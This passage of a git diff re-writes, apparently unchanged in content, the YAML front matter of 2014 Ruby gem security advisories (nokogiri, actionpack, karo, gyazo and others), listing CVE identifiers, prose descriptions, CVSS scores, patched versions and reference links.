+    This may allow a remote attacker to bypass the sandbox for code execution.
+  patched_versions:
+  - ">= 0.2.3"
+  related:
+    url:
+    - https://www.exploit-db.com/exploits/33028
+    - https://security.snyk.io/vuln/SNYK-RUBY-JRUBYSANDBOX-20156
+---
diff --git a/advisories/_posts/2014-04-30-OSVDB-118481.md b/advisories/_posts/2014-04-30-OSVDB-118481.md
index c8350cec..400e34e4 100644
--- a/advisories/_posts/2014-04-30-OSVDB-118481.md
+++ b/advisories/_posts/2014-04-30-OSVDB-118481.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'OSVDB-118481 (nokogiri): Nokogiri Gem for JRuby XML Document Root Element
-  Handling Memory Consumption Remote DoS'
-comments: false
-categories:
-- nokogiri
-- jruby
-advisory:
-  gem: nokogiri
-  platform: jruby
-  osvdb: 118481
-  url: https://github.com/sparklemotion/nokogiri/pull/1087
-  title: Nokogiri Gem for JRuby XML Document Root Element Handling Memory Consumption
-    Remote DoS
-  date: 2014-04-30
-  description: |
-    Nokogiri Gem for JRuby contains a flaw that is triggered when
-    handling a root element in an XML document. This may allow a
-    remote attacker to cause a consumption of memory resources.
-  patched_versions:
-  - "~> 1.6.2.2"
-  - ">= 1.6.3"
-  related:
-    cve:
-    - 2013-6461
-    url:
-    - https://github.com/sparklemotion/nokogiri/pull/1087
-    - https://github.com/sparklemotion/nokogiri/pull/1087/commits/8293bf6fddecb68b688cf025859afde7609f7bff
-    - https://github.com/sparklemotion/nokogiri/commit/a098ddfc9990ea79dbc191407d3e83611e5ff1e6
----
+---
+layout: advisory
+title: 'OSVDB-118481 (nokogiri): Nokogiri Gem for JRuby XML Document Root Element
+  Handling Memory Consumption Remote DoS'
+comments: false
+categories:
+- nokogiri
+- jruby
+advisory:
+  gem: nokogiri
+  platform: jruby
+  osvdb: 118481
+  url: https://github.com/sparklemotion/nokogiri/pull/1087
+  title: Nokogiri Gem for JRuby XML Document Root Element Handling Memory Consumption
+    Remote DoS
+  date: 2014-04-30
+  description: |
+    Nokogiri Gem for JRuby contains a flaw that is triggered when
+    handling a root element in an XML document. This may allow a
+    remote attacker to cause a consumption of memory resources.
+  patched_versions:
+  - "~> 1.6.2.2"
+  - ">= 1.6.3"
+  related:
+    cve:
+    - 2013-6461
+    url:
+    - https://github.com/sparklemotion/nokogiri/pull/1087
+    - https://github.com/sparklemotion/nokogiri/pull/1087/commits/8293bf6fddecb68b688cf025859afde7609f7bff
+    - https://github.com/sparklemotion/nokogiri/commit/a098ddfc9990ea79dbc191407d3e83611e5ff1e6
+---
diff --git a/advisories/_posts/2014-05-06-CVE-2014-0130.md b/advisories/_posts/2014-05-06-CVE-2014-0130.md
index dfdf62f5..6e628ecc 100644
--- a/advisories/_posts/2014-05-06-CVE-2014-0130.md
+++ b/advisories/_posts/2014-05-06-CVE-2014-0130.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2014-0130 (actionpack): Directory Traversal Vulnerability With Certain
-  Route Configurations'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2014-0130
-  ghsa: 6x85-j5j2-27jx
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/NkKc7vTW70o
-  title: Directory Traversal Vulnerability With Certain Route Configurations
-  date: 2014-05-06
-  description: |
-    There is a vulnerability in the 'implicit render'
-    functionality in Ruby on Rails.The implicit render functionality
-    allows controllers to render a template, even if there is no
-    explicit action with the corresponding name.  This module does not
-    perform adequate input sanitization which could allow an attacker to
-    use a specially crafted request to retrieve arbitrary files from the
-    rails application server.
-  cvss_v2: 4.3
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 3.2.18"
-  - "~> 4.0.5"
-  - ">= 4.1.1"
----
+---
+layout: advisory
+title: 'CVE-2014-0130 (actionpack): Directory Traversal Vulnerability With Certain
+  Route Configurations'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2014-0130
+  ghsa: 6x85-j5j2-27jx
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/NkKc7vTW70o
+  title: Directory Traversal Vulnerability With Certain Route Configurations
+  date: 2014-05-06
+  description: |
+    There is a vulnerability in the 'implicit render'
+    functionality in Ruby on Rails.The implicit render functionality
+    allows controllers to render a template, even if there is no
+    explicit action with the corresponding name.  This module does not
+    perform adequate input sanitization which could allow an attacker to
+    use a specially crafted request to retrieve arbitrary files from the
+    rails application server.
+  cvss_v2: 4.3
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 3.2.18"
+  - "~> 4.0.5"
+  - ">= 4.1.1"
+---
diff --git a/advisories/_posts/2014-06-07-OSVDB-107783.md b/advisories/_posts/2014-06-07-OSVDB-107783.md
index 472d1327..2ab3a422 100644
--- a/advisories/_posts/2014-06-07-OSVDB-107783.md
+++ b/advisories/_posts/2014-06-07-OSVDB-107783.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-107783 (screen_capture): Screen Capture Gem for Ruby screen_capture.rb
-  URL Handling Arbitrary Command Execution'
-comments: false
-categories:
-- screen_capture
-advisory:
-  gem: screen_capture
-  osvdb: 107783
-  url: https://github.com/jamster/screen_capture/blob/master/lib/screen_capture.rb
-  title: Screen Capture Gem for Ruby screen_capture.rb URL Handling Arbitrary Command
-    Execution
-  date: 2014-06-07
-  description: |
-    Screen Capture Gem for Ruby contains a flaw in screen_capture.rb that
-    is triggered when handling input passed via the URL. This may allow
-    a context-dependent attacker to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://github.com/jamster/screen_capture/blob/master/lib/screen_capture.rb
-    - http://osvdb.org/show/osvdb/107783
----
+---
+layout: advisory
+title: 'OSVDB-107783 (screen_capture): Screen Capture Gem for Ruby screen_capture.rb
+  URL Handling Arbitrary Command Execution'
+comments: false
+categories:
+- screen_capture
+advisory:
+  gem: screen_capture
+  osvdb: 107783
+  url: https://github.com/jamster/screen_capture/blob/master/lib/screen_capture.rb
+  title: Screen Capture Gem for Ruby screen_capture.rb URL Handling Arbitrary Command
+    Execution
+  date: 2014-06-07
+  description: |
+    Screen Capture Gem for Ruby contains a flaw in screen_capture.rb that
+    is triggered when handling input passed via the URL. This may allow
+    a context-dependent attacker to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://github.com/jamster/screen_capture/blob/master/lib/screen_capture.rb
+    - http://osvdb.org/show/osvdb/107783
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-10075.md b/advisories/_posts/2014-06-30-CVE-2014-10075.md
index 35182194..7a3e7f04 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-10075.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-10075.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2014-10075 (karo): karo Gem for Ruby db.rb Metacharacter Handling Remote
-  Command Execution'
-comments: false
-categories:
-- karo
-advisory:
-  gem: karo
-  cve: 2014-10075
-  osvdb: 108573
-  ghsa: qfwq-chf4-jvwg
-  url: https://github.com/advisories/GHSA-qfwq-chf4-jvwg
-  title: karo Gem for Ruby db.rb Metacharacter Handling Remote Command Execution
-  date: 2014-06-30
-  description: |
-    The karo gem 2.3.8 for Ruby allows Remote command injection via
-    the host field.
-
-    karo Gem for Ruby contains a flaw in db.rb that is triggered when handling
-    metacharacters. This may allow a remote attacker to execute arbitrary
-    commands.
-
-    * CWE-77 - Improper Neutralization of Special Elements used
-      in a Command ('Command Injection')
-
-    * Severity: CRITICAL - CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-10075
-    - https://github.com/rahult/karo
-    - https://github.com/rahult/karo/blob/master/CHANGELOG.md
-    - https://web.archive.org/web/20250421021935/http://www.vapid.dhs.org/advisories/karo-2.3.8.html
-    - http://www.vapidlabs.com/advisory.php?v=63
-    - https://www.openwall.com/lists/oss-security/2014/07/07/22
-    - https://github.com/advisories/GHSA-qfwq-chf4-jvwg
----
+---
+layout: advisory
+title: 'CVE-2014-10075 (karo): karo Gem for Ruby db.rb Metacharacter Handling Remote
+  Command Execution'
+comments: false
+categories:
+- karo
+advisory:
+  gem: karo
+  cve: 2014-10075
+  osvdb: 108573
+  ghsa: qfwq-chf4-jvwg
+  url: https://github.com/advisories/GHSA-qfwq-chf4-jvwg
+  title: karo Gem for Ruby db.rb Metacharacter Handling Remote Command Execution
+  date: 2014-06-30
+  description: |
+    The karo gem 2.3.8 for Ruby allows Remote command injection via
+    the host field.
+
+    karo Gem for Ruby contains a flaw in db.rb that is triggered when handling
+    metacharacters. This may allow a remote attacker to execute arbitrary
+    commands.
+
+    * CWE-77 - Improper Neutralization of Special Elements used
+      in a Command ('Command Injection')
+
+    * Severity: CRITICAL - CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-10075
+    - https://github.com/rahult/karo
+    - https://github.com/rahult/karo/blob/master/CHANGELOG.md
+    - https://web.archive.org/web/20250421021935/http://www.vapid.dhs.org/advisories/karo-2.3.8.html
+    - http://www.vapidlabs.com/advisory.php?v=63
+    - https://www.openwall.com/lists/oss-security/2014/07/07/22
+    - https://github.com/advisories/GHSA-qfwq-chf4-jvwg
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4991.md b/advisories/_posts/2014-06-30-CVE-2014-4991.md
index 4c296b66..36511de7 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4991.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4991.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-4991 (codders-dataset): codders-dataset Gem for Ruby lib/dataset/database/mysql.rb
-  and lib/dataset/database/postgresql.rb Process Table Local Plaintext Credential
-  Disclosure'
-comments: false
-categories:
-- codders-dataset
-advisory:
-  gem: codders-dataset
-  cve: 2014-4991
-  osvdb: 108582
-  ghsa: w9vv-fvw8-j6q3
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4991
-  title: codders-dataset Gem for Ruby lib/dataset/database/mysql.rb and lib/dataset/database/postgresql.rb
-    Process Table Local Plaintext Credential Disclosure
-  date: 2014-06-30
-  description: |
-    "(1) lib/dataset/database/mysql.rb and (2) lib/dataset/database/postgresql.rb
-    in the codders-dataset gem 1.3.2.1 for Ruby place credentials on the mysqldump command
-    line, which allows local users to obtain sensitive information by listing the process."
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4991 (codders-dataset): codders-dataset Gem for Ruby lib/dataset/database/mysql.rb
+  and lib/dataset/database/postgresql.rb Process Table Local Plaintext Credential
+  Disclosure'
+comments: false
+categories:
+- codders-dataset
+advisory:
+  gem: codders-dataset
+  cve: 2014-4991
+  osvdb: 108582
+  ghsa: w9vv-fvw8-j6q3
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4991
+  title: codders-dataset Gem for Ruby lib/dataset/database/mysql.rb and lib/dataset/database/postgresql.rb
+    Process Table Local Plaintext Credential Disclosure
+  date: 2014-06-30
+  description: |
+    "(1) lib/dataset/database/mysql.rb and (2) lib/dataset/database/postgresql.rb
+    in the codders-dataset gem 1.3.2.1 for Ruby place credentials on the mysqldump command
+    line, which allows local users to obtain sensitive information by listing the process."
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4992.md b/advisories/_posts/2014-06-30-CVE-2014-4992.md
index cdef48fa..29c1ba58 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4992.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4992.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2014-4992 (cap-strap): cap-strap Gem for Ruby Process Table Local Plaintext
-  Credential Disclosure'
-comments: false
-categories:
-- cap-strap
-advisory:
-  gem: cap-strap
-  cve: 2014-4992
-  osvdb: 108574
-  ghsa: pcm6-g2qp-9gw8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4992
-  title: cap-strap Gem for Ruby Process Table Local Plaintext Credential Disclosure
-  date: 2014-06-30
-  description: |
-    cap-strap Gem for Ruby contains a flaw that is due to the application
-    exposing credential information in plaintext in the process table listing. This
-    may allow a local attacker to gain access to credential information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4992 (cap-strap): cap-strap Gem for Ruby Process Table Local Plaintext
+  Credential Disclosure'
+comments: false
+categories:
+- cap-strap
+advisory:
+  gem: cap-strap
+  cve: 2014-4992
+  osvdb: 108574
+  ghsa: pcm6-g2qp-9gw8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4992
+  title: cap-strap Gem for Ruby Process Table Local Plaintext Credential Disclosure
+  date: 2014-06-30
+  description: |
+    cap-strap Gem for Ruby contains a flaw that is due to the application
+    exposing credential information in plaintext in the process table listing. This
+    may allow a local attacker to gain access to credential information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4993.md b/advisories/_posts/2014-06-30-CVE-2014-4993.md
index bfe595e6..d2a51b2a 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4993.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4993.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-4993 (backup_checksum): backup_checksum Gem for Ruby /lib/backup/cli/utility.rb
-  Process List Local Plaintext Password Disclosure'
-comments: false
-categories:
-- backup_checksum
-advisory:
-  gem: backup_checksum
-  cve: 2014-4993
-  osvdb: 108569
-  ghsa: wr5j-q359-6vr2
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4993
-  title: backup_checksum Gem for Ruby /lib/backup/cli/utility.rb Process List Local
-    Plaintext Password Disclosure
-  date: 2014-06-30
-  description: |
-    backup_checksum Gem for Ruby contains a flaw in /lib/backup/cli/utility.rb
-    that is triggered as the program displays password information in plaintext
-    in the process list. This may allow a local attacker to gain access to
-    password information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4993 (backup_checksum): backup_checksum Gem for Ruby /lib/backup/cli/utility.rb
+  Process List Local Plaintext Password Disclosure'
+comments: false
+categories:
+- backup_checksum
+advisory:
+  gem: backup_checksum
+  cve: 2014-4993
+  osvdb: 108569
+  ghsa: wr5j-q359-6vr2
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4993
+  title: backup_checksum Gem for Ruby /lib/backup/cli/utility.rb Process List Local
+    Plaintext Password Disclosure
+  date: 2014-06-30
+  description: |
+    backup_checksum Gem for Ruby contains a flaw in /lib/backup/cli/utility.rb
+    that is triggered as the program displays password information in plaintext
+    in the process list. This may allow a local attacker to gain access to
+    password information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4994.md b/advisories/_posts/2014-06-30-CVE-2014-4994.md
index c56f29aa..669e7755 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4994.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4994.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2014-4994 (gyazo): gyazo Gem for Ruby client.rb Metacharacter Handling
-  Remote Command Execution'
-comments: false
-categories:
-- gyazo
-advisory:
-  gem: gyazo
-  cve: 2014-4994
-  osvdb: 108563
-  ghsa: 6x45-86q6-rcmr
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4994
-  title: gyazo Gem for Ruby client.rb Metacharacter Handling Remote Command Execution
-  date: 2014-06-30
-  description: |
-    gyazo Gem for Ruby contains a flaw in client.rb that is triggered when
-    handling metacharacters. This may allow a remote attacker to execute arbitrary commands.
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2014-4994 (gyazo): gyazo Gem for Ruby client.rb Metacharacter Handling
+  Remote Command Execution'
+comments: false
+categories:
+- gyazo
+advisory:
+  gem: gyazo
+  cve: 2014-4994
+  osvdb: 108563
+  ghsa: 6x45-86q6-rcmr
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4994
+  title: gyazo Gem for Ruby client.rb Metacharacter Handling Remote Command Execution
+  date: 2014-06-30
+  description: |
+    gyazo Gem for Ruby contains a flaw in client.rb that is triggered when
+    handling metacharacters. This may allow a remote attacker to execute arbitrary commands.
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4995.md b/advisories/_posts/2014-06-30-CVE-2014-4995.md
index b3a71451..67fe9aa2 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4995.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4995.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-4995 (VladTheEnterprising): VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host}
-  Symlink Multiple Impact'
-comments: false
-categories:
-- VladTheEnterprising
-advisory:
-  gem: VladTheEnterprising
-  cve: 2014-4995
-  osvdb: 108728
-  ghsa: 86cf-g34f-7462
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4995
-  title: VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host} Symlink Multiple
-    Impact
-  date: 2014-06-30
-  description: |
-    VladTheEnterprising Gem for Ruby contains a flaw as the program creates
-    temporary files insecurely. It is possible for a local attacker to use
-    a symlink attack against the /tmp/my.cnf.#{target_host} file they can
-    overwrite arbitrary files, gain access to the MySQL root password,
-    or inject arbitrary commands.
-  cvss_v3: 7.0
----
+---
+layout: advisory
+title: 'CVE-2014-4995 (VladTheEnterprising): VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host}
+  Symlink Multiple Impact'
+comments: false
+categories:
+- VladTheEnterprising
+advisory:
+  gem: VladTheEnterprising
+  cve: 2014-4995
+  osvdb: 108728
+  ghsa: 86cf-g34f-7462
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4995
+  title: VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host} Symlink Multiple
+    Impact
+  date: 2014-06-30
+  description: |
+    VladTheEnterprising Gem for Ruby contains a flaw as the program creates
+    temporary files insecurely. It is possible for a local attacker to use
+    a symlink attack against the /tmp/my.cnf.#{target_host} file they can
+    overwrite arbitrary files, gain access to the MySQL root password,
+    or inject arbitrary commands.
+  cvss_v3: 7.0
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4996.md b/advisories/_posts/2014-06-30-CVE-2014-4996.md
index 26da606d..8d87d05f 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4996.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4996.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-4996 (VladTheEnterprising): VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host}
-  Symlink Multiple Impact'
-comments: false
-categories:
-- VladTheEnterprising
-advisory:
-  gem: VladTheEnterprising
-  cve: 2014-4996
-  osvdb: 108728
-  ghsa: x4vj-279x-qwf2
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4996
-  title: VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host} Symlink Multiple
-    Impact
-  date: 2014-06-30
-  description: |
-    VladTheEnterprising Gem for Ruby contains a flaw as the program creates
-    temporary files insecurely. It is possible for a local attacker to use
-    a symlink attack against the /tmp/my.cnf.#{target_host} file they can
-    overwrite arbitrary files, gain access to the MySQL root password,
-    or inject arbitrary commands.
-  cvss_v3: 5.5
----
+---
+layout: advisory
+title: 'CVE-2014-4996 (VladTheEnterprising): VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host}
+  Symlink Multiple Impact'
+comments: false
+categories:
+- VladTheEnterprising
+advisory:
+  gem: VladTheEnterprising
+  cve: 2014-4996
+  osvdb: 108728
+  ghsa: x4vj-279x-qwf2
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4996
+  title: VladTheEnterprising Gem for Ruby /tmp/my.cnf.#{target_host} Symlink Multiple
+    Impact
+  date: 2014-06-30
+  description: |
+    VladTheEnterprising Gem for Ruby contains a flaw as the program creates
+    temporary files insecurely. It is possible for a local attacker to use
+    a symlink attack against the /tmp/my.cnf.#{target_host} file they can
+    overwrite arbitrary files, gain access to the MySQL root password,
+    or inject arbitrary commands.
+  cvss_v3: 5.5
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4997.md b/advisories/_posts/2014-06-30-CVE-2014-4997.md
index 061fd41a..ff0433bb 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4997.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4997.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2014-4997 (point-cli): point-cli Gem for Ruby /lib/commands/setup.rb Process
-  Table Local Plaintext Credential Disclosure'
-comments: false
-categories:
-- point-cli
-advisory:
-  gem: point-cli
-  cve: 2014-4997
-  osvdb: 108577
-  ghsa: mc8m-x6hf-cw2g
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4997
-  title: point-cli Gem for Ruby /lib/commands/setup.rb Process Table Local Plaintext
-    Credential Disclosure
-  date: 2014-06-30
-  description: |
-    point-cli Gem for Ruby contains a flaw in /lib/commands/setup.rb that
-    is due to the application exposing credential information in plaintext in the process
-    table. This may allow a local attacker to gain access to credential information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4997 (point-cli): point-cli Gem for Ruby /lib/commands/setup.rb Process
+  Table Local Plaintext Credential Disclosure'
+comments: false
+categories:
+- point-cli
+advisory:
+  gem: point-cli
+  cve: 2014-4997
+  osvdb: 108577
+  ghsa: mc8m-x6hf-cw2g
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4997
+  title: point-cli Gem for Ruby /lib/commands/setup.rb Process Table Local Plaintext
+    Credential Disclosure
+  date: 2014-06-30
+  description: |
+    point-cli Gem for Ruby contains a flaw in /lib/commands/setup.rb that
+    is due to the application exposing credential information in plaintext in the process
+    table. This may allow a local attacker to gain access to credential information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4998.md b/advisories/_posts/2014-06-30-CVE-2014-4998.md
index 10ef1259..2bf22915 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4998.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4998.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-4998 (lean-ruport): lean-ruport Gem for Ruby /test/tc_database.rb
-  Process Table Local Plaintext MySQL Password Disclosure'
-comments: false
-categories:
-- lean-ruport
-advisory:
-  gem: lean-ruport
-  cve: 2014-4998
-  osvdb: 108581
-  ghsa: 5g7f-p7jg-v6mv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4998
-  title: lean-ruport Gem for Ruby /test/tc_database.rb Process Table Local Plaintext
-    MySQL Password Disclosure
-  date: 2014-06-30
-  description: |
-    lean-ruport Gem for Ruby contains a flaw in /test/tc_database.rb that
-    is due to the application exposing MySQL password information in plaintext in the
-    process table. This may allow a local attacker to gain access to MySQL password
-    information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4998 (lean-ruport): lean-ruport Gem for Ruby /test/tc_database.rb
+  Process Table Local Plaintext MySQL Password Disclosure'
+comments: false
+categories:
+- lean-ruport
+advisory:
+  gem: lean-ruport
+  cve: 2014-4998
+  osvdb: 108581
+  ghsa: 5g7f-p7jg-v6mv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4998
+  title: lean-ruport Gem for Ruby /test/tc_database.rb Process Table Local Plaintext
+    MySQL Password Disclosure
+  date: 2014-06-30
+  description: |
+    lean-ruport Gem for Ruby contains a flaw in /test/tc_database.rb that
+    is due to the application exposing MySQL password information in plaintext in the
+    process table. This may allow a local attacker to gain access to MySQL password
+    information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-4999.md b/advisories/_posts/2014-06-30-CVE-2014-4999.md
index ac217304..292bf5a7 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-4999.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-4999.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-4999 (kajam): kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb
-  Process List Local Plaintext Password Disclosure'
-comments: false
-categories:
-- kajam
-advisory:
-  gem: kajam
-  cve: 2014-4999
-  osvdb: 108529
-  ghsa: 4ph7-5c44-pppv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4999
-  title: kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb Process List
-    Local Plaintext Password Disclosure
-  date: 2014-06-30
-  description: |
-    kajam Gem for Ruby contains a flaw in
-    /dataset/lib/dataset/database/postgresql.rb that is triggered as the program
-    exposes the MySQL or PostgreSQL password in the process list. This may allow
-    a local attacker to gain access to password information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-4999 (kajam): kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb
+  Process List Local Plaintext Password Disclosure'
+comments: false
+categories:
+- kajam
+advisory:
+  gem: kajam
+  cve: 2014-4999
+  osvdb: 108529
+  ghsa: 4ph7-5c44-pppv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-4999
+  title: kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb Process List
+    Local Plaintext Password Disclosure
+  date: 2014-06-30
+  description: |
+    kajam Gem for Ruby contains a flaw in
+    /dataset/lib/dataset/database/postgresql.rb that is triggered as the program
+    exposes the MySQL or PostgreSQL password in the process list. This may allow
+    a local attacker to gain access to password information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-5000.md b/advisories/_posts/2014-06-30-CVE-2014-5000.md
index 5533867e..169676c1 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-5000.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-5000.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2014-5000 (lawn-login): lawn-login Gem for Ruby /lib/lawn.rb Process Table
-  Local Plaintext Password Disclosure'
-comments: false
-categories:
-- lawn-login
-advisory:
-  gem: lawn-login
-  cve: 2014-5000
-  osvdb: 108576
-  ghsa: rhgq-vv9x-j4p5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5000
-  title: lawn-login Gem for Ruby /lib/lawn.rb Process Table Local Plaintext Password
-    Disclosure
-  date: 2014-06-30
-  description: |
-    lawn-login Gem for Ruby contains a flaw in /lib/lawn.rb that is due to
-    the application exposing password information in plaintext in the process table.
-    This may allow a local attacker to gain access to password information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-5000 (lawn-login): lawn-login Gem for Ruby /lib/lawn.rb Process Table
+  Local Plaintext Password Disclosure'
+comments: false
+categories:
+- lawn-login
+advisory:
+  gem: lawn-login
+  cve: 2014-5000
+  osvdb: 108576
+  ghsa: rhgq-vv9x-j4p5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5000
+  title: lawn-login Gem for Ruby /lib/lawn.rb Process Table Local Plaintext Password
+    Disclosure
+  date: 2014-06-30
+  description: |
+    lawn-login Gem for Ruby contains a flaw in /lib/lawn.rb that is due to
+    the application exposing password information in plaintext in the process table.
+    This may allow a local attacker to gain access to password information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-5001.md b/advisories/_posts/2014-06-30-CVE-2014-5001.md
index e7ff5f8b..3c1bbbd4 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-5001.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-5001.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2014-5001 (kcapifony): kcapifony Gem for Ruby /lib/ksymfony1.rb Process
-  List Local Plaintext Password Disclosure'
-comments: false
-categories:
-- kcapifony
-advisory:
-  gem: kcapifony
-  cve: 2014-5001
-  osvdb: 108571
-  ghsa: 6fcq-3cm2-j3j5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5001
-  title: kcapifony Gem for Ruby /lib/ksymfony1.rb Process List Local Plaintext Password
-    Disclosure
-  date: 2014-06-30
-  description: |
-    kcapifony Gem for Ruby contains a flaw in /lib/ksymfony1.rb that is triggered
-    as the program displays password information in plaintext in the process list. This
-    may allow a local attacker to gain access to password information.
-  cvss_v2: 2.1
-  cvss_v3: 7.8
-  notes: Never patched
-  related:
-    url:
-    - http://www.vapid.dhs.org/advisories/kcapifony-2.1.6.html
-    - http://www.vapidlabs.com/advisory.php?v=65
----
+---
+layout: advisory
+title: 'CVE-2014-5001 (kcapifony): kcapifony Gem for Ruby /lib/ksymfony1.rb Process
+  List Local Plaintext Password Disclosure'
+comments: false
+categories:
+- kcapifony
+advisory:
+  gem: kcapifony
+  cve: 2014-5001
+  osvdb: 108571
+  ghsa: 6fcq-3cm2-j3j5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5001
+  title: kcapifony Gem for Ruby /lib/ksymfony1.rb Process List Local Plaintext Password
+    Disclosure
+  date: 2014-06-30
+  description: |
+    kcapifony Gem for Ruby contains a flaw in /lib/ksymfony1.rb that is triggered
+    as the program displays password information in plaintext in the process list. This
+    may allow a local attacker to gain access to password information.
+  cvss_v2: 2.1
+  cvss_v3: 7.8
+  notes: Never patched
+  related:
+    url:
